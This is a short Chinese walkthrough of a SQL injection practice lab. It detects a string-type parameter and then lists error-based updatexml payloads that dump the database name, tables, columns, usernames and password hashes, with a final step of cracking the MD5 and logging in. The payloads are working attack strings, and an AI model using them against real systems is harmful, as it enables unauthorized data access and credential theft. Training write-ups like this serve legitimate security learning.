靶场地址:
https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe
确认参数类型:
测试:id=1’ 页面回显报错
id=1# 回显正常,本以为是数字类型,结果被骗了,靶场把#号给过滤了,继续测试
id=1’%23 回显正常,确认是字符类型了
根据报错获得数据库名
1' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))%23
根据报错获得表名
1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))%23
根据报错获得列名
1' and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='member'),0x7e),1))%23
获得status为1的name值
1' and (updatexml(1,concat(0x7e,(select group_concat(name) from member where status=1),0x7e),1))%23
获得status为1的password值
由于报错回显的字符串位数有限,因此使用substr进行裁剪
获取1~20位:
1' and (updatexml(1,concat(0x7e,substr((select group_concat(password) from member where status=1),1,20),0x7e),1))%23
获取21~40位:
将密码进行md5解密登陆即可
网友评论